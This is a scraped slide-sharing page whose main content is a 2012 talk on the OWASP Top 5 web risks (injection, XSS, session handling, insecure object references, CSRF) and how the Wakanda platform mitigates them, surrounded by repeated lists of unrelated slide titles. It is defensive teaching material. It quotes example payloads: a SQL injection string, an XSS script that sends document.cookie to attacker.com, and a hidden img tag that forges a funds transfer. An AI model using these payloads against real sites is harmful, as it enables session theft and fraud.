TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Farhan Tariq
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationKnoldus Inc.
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxfnnc6jmgwh
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesMuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesManik S Magar
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesBernd Ruecker
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical InfrastructureVarsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructureitnewsafrica
 

Dernier (20)

TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog Presentation
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesMuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architectures
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical InfrastructureVarsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
 

Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe

  • 1. Wakanda and the Top 5 Security Risks by Alexandre Morgaut
  • 2. Presentation • Wakanda Community manager • W3C AC member • Web Architect • JS Expert, REST Lover, NoSQL Fanboy • W3C “jseverywhere“ community group @amorgaut
  • 3. Agenda • The Open Web Application Security Project • Top 10 Application Security Risks • Zoom on Top 5 • A1 - Injection • A2 - Cross-Site Scripting (XSS) • A3 - Broken Authentication & Session Management • A4 - Insecure Direct Object Reference • A5 - Cross Site Request Forgery (CSRF)
  • 4. OWASP • The Open Web Application Security Project • started in 2001 by Mark Curphey and Dennis Groves • includes corporations, educational organizations, and individuals • Cheat Sheets, Training, Books • AppSec Conferences • TOP 10 Security Risks https://www.owasp.org
  • 5. Top 10 Risks • A1 - Injection • A2 - Cross-Site Scripting (XSS) • A3 - Broken Authentication & Session Management • A4 - Insecure Direct Object Reference • A5 - Cross Site Request Forgery (CSRF) • A6 - Security Misconfiguration • A7 - Insecure Cryptographic Storage • A8 - Failure to Restrict URL Access • A9 - Insufficient Transport Layer Protection • A10 - Unvalidated Redirects and Forwards
  • 6. Injection • Attacks • SQL Injections, JS injections • deferred Injections
  • 7. SQL Injection query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") +"'"; http://example.com/app/accountView?id=' or '1'='1
  • 8. Injection • Attacks • SQL Injections, JS injections • deferred Injections • Preventions • Input check, query parameters • Eval is Evil • new Function() == deferred eval() • no dynamically created JS query expression
  • 9. Wakanda Security • NoSQL • Query parameters • User Access Right at the Database level • CRUD + execution Access Rights • Restricting queries • onRestrictingQuery handler
  • 10. Cross-Site Scripting (XSS) • Attacks • stored, reflected, DOM based • JS injection in the UI
  • 12. XSS Attack page += "<input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC") + "'>";
  • 13. XSS Attack page += "<input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC") + "'>"; http://example.com/?CC='><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi? foo='+document.cookie</script>'.
  • 14. Cross-Site Scripting (XSS) • Attacks • stored, reflected, DOM based • JS injection in the UI • Prevention • validate any input • escape output
  • 15. Wakanda Security • Static HTML files • Data inclusion based on datasources • output escaped by default • Beware • WYSIWYG widget + on Row Draw • deferred effect
  • 16. Broken Authentication & Session Management • Attacks • session fixation in URL or Form • session hijacking
  • 17. Broken Authentication & Session Management http://example.com/sale/saleitems;jsessionid= 2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii
  • 18. Broken Authentication & Session Management • Attacks • session fixation in URL or Form • session hijacking • Prevention • check session owner • session in HTTP only cookie • reasonable timeout
  • 19. Wakanda Security • Session IDs managed automatically • HTTP only restriction • No session ID in URL or Form • Check of user session owner • Check of user-agent session owner
  • 20. Insecure Direct Object Reference • Attacks • changed accessed resource URL
  • 22. Insecure Direct Object Reference query = "SELECT * FROM accts WHERE account = ?"; pstmt = connection.prepareStatement(query , ... ); pstmt.setString( 1, request.getparameter("acct")); results = pstmt.executeQuery( );
  • 23. Insecure Direct Object Reference query = "SELECT * FROM accts WHERE account = ?"; pstmt = connection.prepareStatement(query , ... ); pstmt.setString( 1, request.getparameter("acct")); results = pstmt.executeQuery( ); http://example.com/app/accountInfo?acct=notmyacct
  • 24. Insecure Direct Object Reference • Attacks • changed accessed resource URL • Prevention • Indirect resource reference • Check all resource access rights
  • 25. Wakanda Security • Access always checked by the REST API • User Authenticated at database level • Restricting Queries • Extended DataClass • Current User or Current Group check
  • 26. Cross-Site Request Forgery (CSRF) • Attacks • HTTP request unintentionally sent
  • 28. Cross-Site Request Forgery (CSRF) Transfert API
  • 29. Cross-Site Request Forgery (CSRF) Transfert API http://app.com/transferFunds?amount=1500 &destAccount=4673243243
  • 30. Cross-Site Request Forgery (CSRF) Transfert API http://app.com/transferFunds?amount=1500 &destAccount=4673243243 Give a Picture URL
  • 31. Cross-Site Request Forgery (CSRF) Transfert API http://app.com/transferFunds?amount=1500 &destAccount=4673243243 Give a Picture URL <img src="http://app.com/transferFunds?amount=1500&destAccount=AttackerAccount#“ width="0" height="0">
  • 32. Cross-Site Request Forgery (CSRF) • Attacks • HTTP request unintentionally sent • Prevention • validate any input • use URL manipulations APIs • escape output • use Tokens in forms
  • 33. TOP 10 Risks https://www.owasp.org/index.php/Top_10_2010-Main https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project